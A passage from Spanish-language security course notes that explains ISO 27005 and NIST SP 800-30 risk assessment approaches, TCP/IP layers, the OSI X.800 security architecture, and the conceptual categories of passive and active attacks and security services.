ayudan a la puesta en marcha del SGSI.
RELACIÓN ISO 27001 - 27005

ISO 27001 ISO 27005
GESTIÓN DE LOS RIESGOS DE SEGURIDAD DE LA
SGSI
INFORMACIÓN

Establecer el contexto
Evaluación de riesgos
1 PLAN 1
Elaboración de un Plan de Tratamiento del Riesgo
Aceptación del riesgo
2 DO 2 Implementación del Plan de Tratamiento del Riesgo
3 CHECK 3 Seguimiento continuo y revisión de los riesgos
Mantener y mejorar la Gestión de los Riesgos de
4 ACT 4
Seguridad de la Información
Dependiendo del alcance y los objetivos de la gestión del riesgo, se pueden aplicar
diferentes enfoques y este, a su vez, puede ser diferente para cada iteración.
Debe seleccionarse o desarrollarse un enfoque de gestión del riesgo adecuado que
aborde criterios básicos tales como:
• Criterios de evaluación de riesgos.
• Criterios de impacto.
• Criterios de aceptación de riesgos.
Además, la organización debe evaluar si dispone de los recursos necesarios para:
• Realizar la evaluación de riesgos y establecer un plan de tratamiento de
riesgos.
• Definir e implementar políticas y procedimientos, incluyendo la
implementación de los controles seleccionados.
• Monitorizar los controles.
• Supervisar el proceso de gestión del riesgo de seguridad de la
información.
APROXIMACIONES A LA APRECIACIÓN DE RIESGOS

La ISO 27005 plantea dos aproximaciones en relación con la apreciación de riesgos de
seguridad de la información: de alto nivel o detallada (ISO 27005, 2018).
APROXIMACIÓN DE ALTO NIVEL

Permite definir las prioridades y la cronología de las acciones. Por diversas razones, como
puede ser la presupuestaria, puede que no sea posible implementar simultáneamente
todos los controles necesarios y en el proceso de tratamiento del riesgo solo se puedan
contemplar los riesgos más críticos, que pueden ser abordados a través del proceso de
tratamiento de riesgo.
Además, puede ser prematuro iniciar una apreciación detallada de los riesgos si se prevé
que su tratamiento no va a ser inmediato y se realizará dentro de uno o dos años. Para
este caso, la apreciación de riesgos puede iniciarse con una apreciación de alto nivel de

las consecuencias en lugar de comenzar con un análisis sistemático de los activos, de las
amenazas, de las vulnerabilidades y de las consecuencias.
Otra razón para utilizar una aproximación de alto nivel es facilitar la sincronización de
la apreciación de riesgos con otros planes relacionados con la gestión del cambio y la
continuidad del negocio.
Características del proceso iterativo de apreciación de riesgos de alto nivel:
• Proporciona una visión más global de la organización y sus sistemas
de información, considerando los aspectos tecnológicos como
independientes de las cuestiones empresariales. De esta forma,
el análisis del contexto se centra más en el entorno empresarial y
operacional que en los elementos tecnológicos.
• Permite contemplar una lista más limitada de amenazas y
vulnerabilidades agrupadas en dominios definidos o, para agilizar el
proceso, puede centrarse en escenarios de riesgo o ataque en lugar de
sus elementos.
• Los riesgos contemplados en una apreciación de riesgo de alto nivel
son, con frecuencia, riesgos más generales que los riesgos específicos
identificados.
• No suele contemplar los detalles tecnológicos.
• Es más apropiada para proporcionar controles organizativos y no
técnicos, así como aspectos de gestión de los controles o salvaguardas
técnicos clave y comunes, como son las copias de seguridad y antivirus.
Las ventajas de una apreciación de riesgos con un enfoque de alto nivel son:
• Es probable que la utilización de un enfoque inicial sencillo facilite la
aceptación del programa de apreciación de riesgos.
• Facilita la elaboración de una visión estratégica del programa de
seguridad de la información de la organización.
• Ayuda a que los recursos, tanto económicos, como de otro tipo, se
utilicen donde sean más útiles, y a priorizar la protección de los sistemas
más críticos.
Un análisis de riesgos inicial de alto nivel es menos preciso y su única desventaja es que
algunos procesos o sistemas pueden no ser identificados lo que requerirá una segunda
apreciación de riesgo detallada.
Esto puede evitarse si hay información adecuada sobre todos los aspectos de la
organización, su información y sus sistemas, incluida la información que se haya obtenido
de la evaluación de incidentes de seguridad de la información.
La apreciación del riesgo de alto nivel considera el valor de los activos de información
de la organización y los riesgos a los que están expuestos desde un punto de vista de
negocio.
Varios factores ayudan a determinar si la apreciación de alto nivel es adecuada para
tratar los riesgos, estos factores pueden incluir lo siguiente:
• Los objetivos de negocio que necesitan varios activos de información
para ser alcanzados.
• El grado de dependencia de los negocios de la organización de los
activos de información.
• El nivel de inversión en cada activo de información, en términos de

desarrollo, mantenimiento o sustitución del activo.
• Los activos de información, para los cuales la organización asigna
directamente un valor.
Cuando se evalúan estos factores se facilita la decisión. Si los objetivos que dependen
de un activo son extremadamente importantes para el desarrollo del negocio de una
organización o si los activos están expuesto a un alto riesgo, debe realizarse una segunda
iteración, con una apreciación detallada del riesgo para el activo de información en
concreto (o parte de este).
Una regla general de aplicación es que, si la falta de seguridad de la información puede
causar consecuencias adversas significativas para la organización, sus procesos de
negocios o sus activos, entonces es necesaria una segunda iteración de la apreciación
del riesgo de iteración, a un nivel más detallado, para identificar riesgos potenciales.
APRECIACIÓN DETALLADA DEL RIESGO DE SEGURIDAD DE LA

INFORMACIÓN
El proceso detallado de apreciación del riesgo de seguridad de la información contempla
la identificación y valoración en profundidad de los activos, la evaluación de las amenazas
a la que están expuestas dichos activos y la evaluación de sus vulnerabilidades. Los
resultados de estas actividades se utilizan para evaluar los riesgos y posteriormente
identificar el tratamiento de riesgo adecuado.
La apreciación detallada del riesgo suele requerir mucho tiempo, esfuerzo y experiencia,
por lo que puede ser más adecuado para sistemas de información de alto riesgo.
La última etapa de la apreciación detallada de los riesgos de seguridad de la información
consiste en evaluar los riesgos generales.
Las consecuencias pueden evaluarse de varias maneras, incluyendo el uso de métodos
de valoración cuantitativos, cuantitativos o de una combinación de ambos.
Para evaluar la probabilidad de materialización de una amenaza, debe establecerse el
marco temporal sobre el cual el activo tiene valor o es necesario proteger. La probabilidad
de que se materialice una amenaza específica depende de:
• El atractivo del bien o el posible impacto.

• La facilidad de obtención de beneficio por parte del atacante de la
explotación de la vulnerabilidad.
• Las capacidades técnicas del atacante.
• La facilidad de explotación de la vulnerabilidad.
Muchos métodos hacen uso de tablas y combinan medidas subjetivas y empíricas. Es

importante que la organización utilice un método con el que se sienta cómoda, en el que
tenga confianza y que produzca resultados repetibles.

5.2. NIST 80-30 Rev. 1
Las organizaciones, independientemente de su tamaño y del sector al que pertenezcan,
tienen una gran dependencia de la tecnología de la información y los sistemas de
información para desarrollar sus operaciones y así alcanzar con éxito sus objetivos de
negocio.
Existen sistemas de información muy diversos que van desde redes de oficinas, sistemas
financieros y de personal hasta sistemas muy especializados, como pueden ser: sistemas
de control industrial o de procesos, sistemas de armas, sistemas de telecomunicaciones
y sistemas de control ambiental.
Los sistemas de información están expuestos a graves amenazas que pueden tener
efectos adversos en las operaciones y en los activos de la organización. Individuos, otras
organizaciones u otros países pueden explotar las vulnerabilidades, tanto conocidas como
desconocidas, de dichos sistemas, para comprometer la confidencialidad, integridad o
disponibilidad de la información que procesan, almacenan o transmiten.
Las amenazas a los sistemas de información pueden ser de carácter intencionado,
errores humanos o mecánicos, fallos estructurales, medioambientales e incluso una
combinación de diversos tipos.
Es necesario que los gerentes de todos los niveles de la organización entiendan sus
responsabilidades y sean conscientes de la necesidad de gestionar el riesgo de seguridad
de la información, es decir, el riesgo asociado con la operación y el uso de los sistemas
de información que respaldan el funcionamiento de las operaciones de la organización.
PROCESO DE GESTIÓN DEL RIESGO
NIST 800-39 Gestión de riesgos de seguridad de la información: vista de

organización, misión y sistema de información.
La evaluación de riesgos es un proceso holístico que forma parte del proceso de gestión
de riesgos de la organización.
De acuerdo con la NIST Special Publication 800-39, los procesos de gestión de riesgos
incluyen (National Institute of Standards and Technology, 2011):
• El marco de referencia del riesgo.

• La evaluación de riesgos.
• La respuesta a los riesgos.
• El seguimiento de los riesgos.
El marco de referencia es el primer componente de la gestión de riesgos, en el que la

organización establece el contexto del riesgo, es decir, se describe el entorno en el que se
van a tomar las decisiones basadas en el riesgo.
El propósito del marco de referencia es elaborar una estrategia de gestión de riesgos
que establezca cómo la organización va a analizar, responder y monitorizar el riesgo.
La estrategia de gestión de riesgos establece una base para la gestión de riesgos y
establece los criterios para la toma de decisiones basadas en riesgos de la organización.
El segundo componente de la gestión de riesgos, la evaluación de riesgos aborda cómo
la organización evalúa el riesgo de acuerdo con el contexto establecido en el marco de
referencia del riesgo.
El propósito de la evaluación de riesgos es identificar:
• Las amenazas a la que está expuesta la organización.

• Las vulnerabilidades internas y externas a la organización.
• El daño o impacto que pudiera sufrir la organización, dado el potencial
de las amenazas que pudieran explotar las vulnerabilidades.
• La probabilidad de que se materialice la amenaza y se produzca un
impacto.
El resultado de la evaluación de riesgos es una valoración del riesgo, típicamente, una

función del impacto y la probabilidad.
El tercer componente de la gestión de riesgos es la respuesta al riesgo de la organización,
que se realiza una vez que el valor del riesgo se determina en función de los resultados
de la evaluación de riesgos.
El propósito de la respuesta al riesgo es proporcionar una respuesta consistente al riesgo
de toda la organización de acuerdo con el marco de referencia del riesgo:
• Desarrollar alternativas para responder al riesgo.

• Evaluar las alternativas para responder al riesgo.
• Determinar las respuestas apropiadas, consistentes con la tolerancia
al riesgo de la organización. Implementar las respuestas al riesgo
seleccionadas.
El cuarto componente de la gestión de riesgos, la supervisión del riesgo aborda cómo la

organización monitoriza el riesgo a lo largo del tiempo.
El propósito de la supervisión de riesgos es:
• Valorar de forma continua la efectividad de las respuestas al riesgo.

• Identificar los cambios de los sistemas de información que impactan el
riesgo organizacional y de los entornos en los que operan los sistemas.
• Verificar que se han implementado las respuestas al riesgo planificadas
y que los requisitos de seguridad de la información se derivan de las

necesidades de la organización y del cumplimiento de las obligaciones
legales y contractuales.
EVALUACIÓN DE RIESGOS
Profundizando en el componente de Evaluación de riesgos, la NIST SP 800-30 Rev.1
proporciona un modelo de proceso metódico para la evaluación de riesgos con los
siguientes pasos:
• Preparación de la evaluación de riesgos.

• Ejecución de la evaluación de riesgos.
• Comunicación de los resultados de la evaluación de riesgos al personal
clave de la organización.
• Mantenimiento de la evaluación de riesgos a lo largo del tiempo.
Las evaluaciones de riesgos contemplan los posibles riesgos para las operaciones y
los activos de la organización, derivados de la operación y el uso de los sistemas de
información y de la información que procesan, almacenan y transmiten.
Las evaluaciones de riesgos dan soporte a una amplia variedad de decisiones y
actividades basadas en riesgos por parte la organización, entre las que se incluyen:
• Desarrollo de una arquitectura de seguridad de la información.
• Definición de los requisitos de interconexión para los sistemas de
información.
• Diseño de soluciones de seguridad para sistemas de información y
entornos de operación.
• Autorización para operar sistemas de información.
• Implementación de soluciones de seguridad.
• Operación y mantenimiento de soluciones de seguridad.
ENFOQUES DE LA EVALUACIÓN DE RIESGOS

El riesgo y sus factores contribuyentes se pueden evaluar de varias maneras: el enfoque
cuantitativo, el cualitativo o el semicuantitativo. Cada uno de estos enfoques tiene
ventajas y desventajas respecto al resto. A la hora de realizar una evaluación de riesgos
se puede adoptar un único enfoque o una combinación de estos en función de las
necesidades y de la cultura de la organización.
Las evaluaciones cuantitativas utilizan un conjunto de métodos, principios o reglas
para evaluar el riesgo en función de valores numéricos, donde los significados y la
proporcionalidad de los valores se mantienen dentro y fuera del contexto de la evaluación.
Este tipo de evaluación apoya de una manera más efectiva los análisis de coste/beneficio
de las posibles respuestas al riesgo que los otros tipos de evaluación.
Sin embargo, el significado de los valores numéricos de una evaluación cuantitativa puede
que no sea siempre claro el resultado, lo que requerirá una interpretación y explicación.

Adicionalmente, el rigor de la cuantificación disminuye significativamente cuando
valoraciones subjetivas se ocultan dentro de evaluaciones cuantitativas o cuando existe
una incertidumbre significativamente relevante a la hora de determinar la valoración
numérica.
Los beneficios de las evaluaciones cuantitativas pueden, en algunos casos, ser
compensados por los costes derivados del tiempo y esfuerzo de los expertos y el posible
despliegue y uso de herramientas necesarias para hacer tales evaluaciones.
A diferencia de las evaluaciones cuantitativas, las evaluaciones cualitativas utilizan un
conjunto de métodos, principios o reglas para evaluar el riesgo en función de categorías
o niveles no numéricos, como pueden ser: muy bajo, bajo, moderado, alto, muy alto.
La evaluación cualitativa es de gran ayuda a la hora de la comunicación de los
resultados de la evaluación del riesgo a los responsables de la toma de decisiones. Sin
embargo, el rango de valores en las evaluaciones cualitativas es comparativamente
pequeño en la mayoría de los casos, lo que supone una dificultad a la hora de priorizar
los riesgos o la de efectuar comparaciones entre los diferentes riesgos reportados.
Adicionalmente, a menos que cada valor esté perfectamente definido o se le caracterice
por medio de ejemplos significativos, se podrían producir resultados de evaluación de
riesgos con diferencias significativas, por parte de diferentes expertos que habitualmente
confían en sus experiencias individuales.
Las evaluaciones semicuantitativas utilizan un conjunto de métodos, principios o reglas
para evaluar el riesgo que utilizan agrupaciones, escalas o valores numéricos cuyos
rangos y significados no se mantienen en otros contextos.
Pueden combinar los beneficios de las evaluaciones cuantitativas y cualitativas.
Las agrupaciones y escalas se traducen fácilmente en términos cualitativos que ayudan

a la comunicación de los resultados de la evaluación del riesgo a los responsables de la
toma de decisiones las comunicaciones de riesgos para los tomadores de decisiones.
El papel del juicio experto en la asignación de valores es más evidente que en un enfoque
puramente cuantitativo.
Además, si las escalas o agrupaciones proporcionan suficiente granularidad, la priorización
relativa entre los resultados está mejor respaldada que en un enfoque puramente
cualitativo.
Al igual que en un enfoque cuantitativo, el rigor disminuye significativamente cuando
valoraciones subjetivas se ocultan dentro de evaluaciones cuantitativas o cuando
existe una incertidumbre significativamente relevante a la hora de determinar el valor.
APROXIMACIONES AL ANÁLISIS DE RIESGOS

Las aproximaciones al análisis de riesgos difieren con respecto a la orientación o el punto
de partida de la evaluación de riesgos, el nivel de detalle en la evaluación y de cómo se
tratan los riesgos debidos a escenarios de amenazas similares.

Las aproximaciones pueden ser:
• Orientada a amenazas.
• Orientada al impacto en el activo.
• Orientada a la vulnerabilidad.
Una aproximación orientada a la amenaza comienza con la identificación de las
fuentes y los eventos de las amenazas y se centra en el desarrollo de los escenarios de la
amenaza. Las vulnerabilidades se identifican dentro el contexto de las amenazas y los
impactos se identifican en función de la intención del atacante.
Una aproximación orientada al impacto en los activos comienza con la identificación
de los impactos o consecuencias sobre los activos críticos que pueden ser una fuente
de preocupación, utilizando para ello los objetivos de negocio de la organización o
los resultados de un análisis de impacto en el negocio, identificando los eventos de
amenazas que nos podrían llevar a determinar los orígenes de amenazas.
Una aproximación orientada a la vulnerabilidad se inicia identificando el conjunto de
condiciones preexistentes, debilidades y deficiencias de los sistemas de información
de la organización o los entornos en los que operan los sistemas, que pueden ser
explotables por un atacante, e identifica las amenazas y condiciones necesarias para
explotar esas vulnerabilidades.
Cada aproximación al análisis tiene en cuenta los mismos factores de riesgo y, por lo
tanto, conlleva el mismo conjunto de actividades de evaluación de riesgos, aunque en un
orden diferente.
Las diferencias en el punto de partida de la evaluación de riesgos pueden sesgar los
resultados, lo que puede provocar que algunos riesgos no se identifiquen. Por lo tanto, la
identificación de riesgos desde una segunda aproximación puede mejorar el rigor y la
efectividad del análisis.
Adicionalmente, se pueden aplicar técnicas de análisis más rigurosas, como pueden ser
los análisis basados en gráficos, para proporcionar una forma efectiva de explicar las
relaciones de muchos a muchos entre:
• Fuentes de amenazas y eventos de amenazas: un solo evento de
amenaza puede ser causado por múltiples fuentes de amenaza y una
sola fuente de amenaza puede causar múltiples eventos de amenaza.
• Eventos de amenaza y vulnerabilidades: un solo evento de amenaza
puede explotar múltiples vulnerabilidades y una sola vulnerabilidad
puede ser explotada por múltiples eventos de amenaza.
• Eventos de amenaza e impactos / activos: un solo evento de amenaza
puede afectar múltiples activos o tener múltiples impactos y un solo
activo puede verse afectado por múltiples eventos de amenaza.
PROCESO DE EVALUACIÓN DEL RIESGO

El proceso de evaluación de riesgos, como se indicaba antes, se compone de cuatro
fases:
1. Preparación. 3. Comunicación de resultados.
2. Ejecución. 4. Mantenimiento.

FASE 1: PREPARACIÓN PARA LA EVALUACIÓN DE RIESGOS
La primera fase del proceso de evaluación de riesgos es la preparación para la evaluación.
El objetivo de esta fase es establecer el contexto para la evaluación de riesgos. Este
contexto se establece con base en el marco de referencia del proceso de gestión de
riesgos.
El marco de referencia del riesgo establece los criterios de la organización con respecto
a políticas y requisitos para realizar evaluaciones de riesgo, metodologías de evaluación
específicas que se emplearán, procedimientos para seleccionar los factores de riesgo a
considerar, alcance de las evaluaciones, rigor de análisis, grado de formalidad y requisitos
que van a permitir realizar evaluaciones de riesgo consistentes y repetibles en toda la
organización. La preparación para la evaluación de riesgos incluye las siguientes tareas:
• Identificar el propósito de la evaluación.
• Identificar el alcance de la evaluación.
• Identificar los supuestos y limitaciones asociados con la
evaluación.
• Identificar las fuentes de información que se utilizarán como
entrada para la evaluación.
• Identificar el modelo de riesgo y los enfoques analíticos que se
emplearán durante la evaluación.
FASE 2: EJECUCIÓN DE LA EVALUACIÓN

La ejecución de la evaluación de riesgos incluye las siguientes tareas:
• Identificar los orígenes de la amenaza.
• Identificar los eventos de amenaza.
• Identificar vulnerabilidades y condiciones preexistentes.
• Estimar la probabilidad de ocurrencia.
• Estimar el impacto.
• Estimar el riesgo.
Para estimar la probabilidad de ocurrencia de una materialización de una amenaza hay
que considerar:
• Los orígenes de la amenaza.
• Las vulnerabilidades y condiciones preexistentes.
• Los controles o medidas de seguridad existentes.
FASE 3: COMUNICACIÓN DE RESULTADOS
La tercera fase del proceso de evaluación de riesgos es comunicar los resultados de la
evaluación y compartir la información relacionada con el riesgo. El objetivo de esta fase
es garantizar que los responsables de la toma de decisiones en toda la organización
tengan la información necesaria relativa al riesgo.
La comunicación y el intercambio de información constan de las siguientes tareas
específicas:

• Comunicar los resultados de la evaluación de riesgos.
• Compartir información obtenida en la ejecución de la evaluación
de riesgos para apoyar otras actividades de gestión de riesgos.
FASE 4: MANTENIMIENTO DE LA EVALUACIÓN

La cuarta fase del proceso de evaluación de riesgos es el mantenimiento de la evaluación.
El objetivo de esta fase es mantener actualizado el conocimiento específico del riesgo.
Los resultados de las evaluaciones de riesgos proporcionan información para la toma
de decisiones de gestión de riesgos y guían las respuestas a los riesgos. Con el objetivo
de dar soporte a la revisión continua de las decisiones relativas a la gestión de riesgos
es necesario efectuar un mantenimiento de riesgos para incorporar cualquier cambio
detectado a través de la monitorización.
La monitorización proporciona a la organización los medios para:
• Determinar la efectividad de las respuestas al riesgo.
• Identificar los cambios que afectan el riesgo de los sistemas de
información de la organización y los entornos en los que operan
dichos sistemas.
• Verificar el cumplimiento.
El mantenimiento de la evaluación de riesgos incluye las siguientes tareas específicas:
• Monitorización continua de los factores de riesgo identificados
en la evaluación de riesgo, para detectar y comprender dichos
cambios
• Actualización de la evaluación de riesgos de forma que refleje los
cambios detectados en la monitorización.
6. Seguridad en redes.
Identificación de amenazas y
vectores de ataque
6.1. Aspectos avanzados de TCP/IP
TCP/IP tiene una estructura basada en capas fundamentada en el estándar de los

protocolos de comunicaciones Open Systems Interconnection (OSI) que diseñó la
Organización Internacional de Normalización (ISO — International Standard Organization).
El modelo TCP/IP describe una serie de guías generales de diseño e implementación

de protocolos de red específicos para permitir que un conjunto de equipos pueda
comunicarse a través de una red. TCP/IP provee conectividad de extremo a extremo,
especificando la manera en que los datos deberán ser formateados, direccionados,
transmitidos, encaminados y recibidos por el destinatario. El protocolo TCP/IP permite la
interconexión de computadores de cualquier tamaño, fabricante o sistema operativo.
Los protocolos de red normalmente se desarrollan en capas, de manera que cada
capa es la responsable de una parte de la comunicación. Una familia de protocolos,
como TCP/IP, es el resultado de combinar distintos protocolos en las diferentes capas.
TCP/IP consta de cuatro capas: capa física, capa de red, capa de transporte y capa de
aplicación; frente a las siete capas que forman el modelo OSI, tal y como podemos ver en
la siguiente imagen:
Ilustración 33. Comparativa del modelo OSI frente almodelo TCP/IP
• Capa física: se corresponde con la capa de enlace y la capa física

del modelo OSI. Normalmente incluye el driver del dispositivo en el
sistema operativo y la correspondiente tarjeta de interfaz de red de la
computadora Ofrece los recursos que permiten la transmisión de los
datos a través de la red. Ejemplos de protocolos que componen esta
capa son: Ethernet (IEEE 802.3), Wifi (IEEE 802.11), Address Resolution
Protocole (ARP) o Reverse Address Resolution Protocol (RARP).
• Capa de red: se corresponde con la capa de red del modelo OSI. Permite
el encaminamiento y maneja el movimiento de los paquetes en la
red. Ejemplos de protocolos que componen esta capa son: Internet
Protocol (IP), Internet Control Message Protocol (ICMP) o Internet Group
Management Protocol (IGMP).
• Capa de transporte: se corresponde con la capa de transporte del
modelo OSI. Provee el flujo de datos entre dos equipos que será utilizado
por la capa superior (capa de aplicación). Los dos protocolos más
utilizados en esta capa son Transmission Control Protocol (TCP) y User
Datagram Protocol (UDP) cuyas principales características podemos ver
descritas en la siguiente imagen.

Ilustración 34. Carcaterísticas fundamentales de los protocolos TPC y UDP
• Capa de aplicación: se corresponde con las capas de sesión,

presentación y aplicación del modelo OSI. Gestiona las características de
una aplicación en particular. Algunas de las aplicaciones más comunes
en este nivel son Telnet, File Transfer Protocol (FTP), Simple Mail Transfer
Protocol (SMTP), HyperText Transfer Protocol (HTTP), Network Time
Protocol (NTP), etc.
6.2. Modelo de seguridad OSI

La Organización Internacional para la Estandarización desarrolló una manera sistemática
de especificar los requisitos de seguridad con el fin de facilitar a los responsables de
seguridad de las organizaciones la tarea de definir y realizar el análisis de las necesidades
de seguridad de estas, así como la evaluación de los productos y políticas de seguridad
que serían aplicadas. Esta especificación se definió en la recomendación X.800 de la
Unión Internacional de Telecomunicaciones (ITU) con el nombre de Arquitectura de
seguridad OSI (Open System Interconnection).
La arquitectura de seguridad OSI se centra en tres aspectos principales, tal como puede
verse en el siguiente esquema:
Ilustración 35. Definición de ataques, mecanismos y servicios de seguridad

En este contexto, es importante tener claros los conceptos de vulnerabilidad, amenaza y
ataque; tal como se describen en el RFC 4949.
• Amenaza: posibilidad de violar la seguridad que existe si se da una
circunstancia, capacidad, acción o evento que puede infringir la
seguridad y causar daño. Esto es, una amenaza es el posible riesgo de
que una vulnerabilidad sea explotada.
• Ataque: asalto a la seguridad de un sistema derivado de una amenaza
inteligente, es decir, acto deliberado que intenta evadir los servicios de
seguridad y violar las políticas de seguridad de un sistema.
• Vulnerabilidad: fallo o debilidad en el diseño, implementación u
operación y gestión de un sistema que puede ser explotado para violar
la política de seguridad de este.
6.3. Ataques a la seguridad.

Los ataques a la seguridad se pueden clasificar principalmente en dos tipos: ataques
activos y ataques pasivos.
Un ataque activo tiene como objetivo la alteración de los recursos del sistema, pudiendo
afectar a su funcionamiento. Por el contrario, la finalidad de un ataque pasivo no es
alterar la comunicación sino «escuchar» y analizar el tráfico de la red sin afectar a los
recursos.
ATAQUES PASIVOS
Un ataque pasivo es aquel en el cual un atacante monitorea de forma no autorizada
el tráfico de la red para capturar contraseñas u otra información para su uso posterior.
Principalmente hay dos tipos de ataques pasivos: la obtención de contenidos de mensajes
y el análisis de tráfico.
La obtención de contenidos de mensajes (Ilustración 157) se entiende como la obtención
de información procedente de una comunicación (conversación telefónica, envío de
correo electrónico, envío de fichero, etc.) y que puede contener información sensible que
no debe ser revelada a entidades no autorizadas.
Ilustración 36. Obtención de contenidos de mensajes

El análisis de tráfico (Ilustración 158) es un ataque que permite al atacante observar
no solo el contenido de los mensajes enviados por la red, sino también el patrón de
dichos mensajes. Aun habiendo cifrado el contenido de los mensajes intercambiados
para prevenir su lectura no autorizada, un atacante podría extraer información de la
comunicación que le permitiese determinar el tipo de comunicación que está teniendo
lugar.
Ilustración 37. Análisis de tráfico
La detección de este tipo de ataques es bastante complicada, ya que no se produce

ningún tipo de alteración en los mensajes que circulan por la red. Sin embargo, existen
herramientas y mecanismos de seguridad que ayudan a prevenirlos. La técnica más
común para prevenir este tipo de ataques es el enmascaramiento de contenidos a
través del cifrado de los mensajes y el uso de relleno (padding) para dificultar el análisis
del tráfico.
ATAQUES ACTIVOS
En un ataque activo, el intruso interfiere con el tráfico legítimo que fluye a través de la
red interactuando de manera engañosa con el protocolo de comunicación.
Principalmente hay cuatro tipos de ataques activos: suplantación de identidad, repetición,
modificación de mensajes y denegación de Servicio.
La suplantación de identidad (Ilustración 159) se da cuando una entidad se hace pasar
por otra. Normalmente, para llevar a cabo este tipo de ataque es necesario utilizar
previamente algún otro tipo de ataque activo (como podría ser un ataque de repetición)
que permita al atacante obtener los privilegios necesarios para acceder a un sistema,
fingiendo ser una entidad que realmente los posee.

Ilustración 38. Suplantación de identidad
La repetición (Ilustración 160) se entiende como la captura de uno o más mensajes

del tráfico de la red para su posterior retransmisión, con el fin de provocar un efecto no
deseado como, por ejemplo, realizar varias veces un ingreso de dinero en una cuenta.
Ilustración 39. Repetición
En un ataque de modificación de mensajes (Ilustración 161), un mensaje original es

modificado parcialmente con el fin de producir un efecto no deseado.
Ilustración 40. Modificación de mensajes

Un ataque de denegación de servicio (Ilustración 162) causa que un servicio o recurso
sea inaccesible a los usuarios legítimos. Normalmente, este tipo de ataque provoca la
pérdida de la conectividad de la víctima debido a la saturación de su ancho de banda
de la red o la sobrecarga de sus recursos computacionales.
Ilustración 41. Denegación de servicio
La prevención de ataques activos es muy difícil. Por este motivo, para mitigar este tipo
de ataques las medidas preventivas se combinan con herramientas y mecanismos que
permiten su detección o recuperación en caso de llegar materializarse el ataque.
En el vídeo, La seguridad en distintas capas de red, se presentan algunos ejemplos
que clarifican la diferencia existente entre aplicar seguridad en distintas capas de la
arquitectura TCP/IP. Por ejemplo, se muestra la diferencia entre securizar una comunicación
a nivel físico o a nivel de transporte.
6.4. Servicios y mecanismos de seguridad.
SERVICIOS DE SEGURIDAD
En la recomendación X.800 se describe un servicio de seguridad como un servicio
proporcionado por una capa de sistemas abiertos comunicantes, que garantiza la
seguridad adecuada de los sistemas y de la transferencia de datos. Estos servicios se
dividen en cinco categorías y catorce servicios específicos.
AUTENTICACIÓN
El servicio de autenticación se encarga de confirmar que la identidad de una o más
entidades conectadas a una o más entidades sea verdadera. De igual forma, corrobora
a una entidad que la información recibida proviene de otra entidad verdadera.

En el caso de una comunicación continuada entre dos entidades, deben tenerse en
cuenta dos aspectos:
• Al iniciar la conexión, asegurar la autenticidad de la entidad en cada

extremo.
• Cerciorar que la comunicación no está intervenida de manera que
un tercero pueda suplantar la identidad de una de las entidades
autorizadas.
Dentro del servicio de autenticación, se definen dos tipos de servicios específicos:
• Autentificación de las entidades origen/destino: permite la verificación

de la identidad de las entidades en los extremos de la comunicación.
• Autentificación del origen de los datos: se da en comunicaciones no
orientadas a conexión y permite verificar la identidad de la entidad
emisora de los datos.
CONTROL DE ACCESO
Protege a una entidad contra el uso no autorizado de sus recursos. Para ello, previamente
cualquier entidad que intente acceder a un recurso debe identificarse y ser autenticada
de forma que los derechos de acceso puedan aplicarse de manera particular.
CONFIDENCIALIDAD
La confidencialidad se entiende como la protección de una entidad contra la revelación
deliberada o accidental de cualquier conjunto de datos a entidades no autorizadas.
Existen enfoques más específicos de este servicio, como la protección de un solo mensaje
o de determinados campos de los mensajes. También es importante la protección de los
datos frente al análisis de tráfico: campos como el origen, destino, frecuencia o longitud no
deberían ser características visibles del tráfico en una comunicación. Dentro del servicio
de confidencialidad se definen los siguientes tipos de servicios específicos:
• Confidencialidad de la conexión: protege los datos transmitidos por las

entidades en una conexión.
• Confidencialidad no orientada a la conexión: protege los datos
transmitidos por las entidades en una comunicación no orientada a
conexión.
• Confidencialidad de campos seleccionados: protege ciertos campos
seleccionados de los datos transmitidos por las entidades en una
comunicación.
• Confidencialidad del flujo de tráfico: protege la información frente al
análisis del tráfico.

INTEGRIDAD DE LOS DATOS
El servicio de integridad permite detectar si los datos transferidos en una comunicación
han sido modificados. Dentro de este servicio se definen los siguientes tipos de servicios
específicos:
• Integridad de la conexión con recuperación: provee integridad a los

mensajes intercambiados en una comunicación orientada a conexión
con posibilidad de recuperar el mensaje original en caso de alteración
de este.
• Integridad de la conexión sin recuperación: provee integridad a los
mensajes intercambiados en una comunicación orientada a conexión.
• Integridad de la conexión de campos seleccionados: provee integridad
a ciertos campos seleccionados de los mensajes intercambiados en una
comunicación orientada a conexión.
• Integridad no orientada a conexión: provee integridad a los mensajes
intercambiados en una comunicación no orientada a conexión.
• Integridad no orientada a conexión de campos seleccionados:
provee integridad a ciertos campos seleccionados de los mensajes
intercambiados en una comunicación no orientada a conexión.
NO REPUDIO
Este servicio asegura que los extremos de una comunicación no puedan negar
falsamente haber enviado o recibido un mensaje. Dentro de este servicio se definen dos
tipos de servicios específicos:
• No repudio en origen: proporciona al receptor de los datos una prueba
del origen de estos, de modo que el emisor no pueda negar haberlos
enviados.
• No repudio en destino: proporciona al emisor de los datos una prueba
de la recepción de estos, de modo que el receptor no pueda negar
haberlos recibido.
DISPONIBILIDAD
La disponibilidad se define como la propiedad que tiene un sistema o recurso de un
sistema de estar accesible y utilizable a petición de una entidad autorizada, según las
especificaciones de rendimiento del sistema.
La finalidad de un servicio de disponibilidad es la protección de un sistema para asegurar

que está accesible y es utilizable, y evitar los posibles problemas derivados de ataques de
denegación de servicio.
Para terminar con la exposición de los servicios de seguridad, en la siguiente tabla podemos
ver una relación en los servicios de seguridad descritos y los ataques existentes. Esto
es, que servicios de seguridad son necesarios para proteger una comunicación frente a
cada uno de los ataques existentes.

ATAQUE
OBTENCIÓN
DEL ANÁLISIS
SUPLANTACIÓN MODIFICACIÓNDE DENEGACIÓN
SERVICIO CONTENIDO DE REPETICIÓN
DE IDENTIDAD MENSAJES DE SERVICIO
DEL TRÁFICO
MENSAJE
AUTENTICACIÓN
DE LAS ENTIDADES X
ORIGEN/DESTINO
AUTENTICACIÓN DEL
ORIGEN DE LOS DATOS X
CONTROL DE ACCESO X
CONFIDENCIALIDAD X
CONFIDENCIALIDAD
DEL FLUJO DE TRÁFICO X
INTEGRIDAD DE LOS
DATOS X X
NO REPUDIO
DISPONIBILIDAD X
MECANISMOS DE SEGURIDAD
Son los mecanismos implementados para proveer los servicios de seguridad necesarios.
Su finalidad es reforzar la seguridad de un sistema permitiendo prevenir, detectar o
recuperarse frente a ataques de seguridad. Los mecanismos de seguridad se dividen
en dos categorías: mecanismos específicos de seguridad y mecanismos generales de
seguridad.
MECANISMOS ESPECÍFICOS DE SEGURIDAD
Los mecanismos específicos de seguridad se incorporan en la capa del protocolo

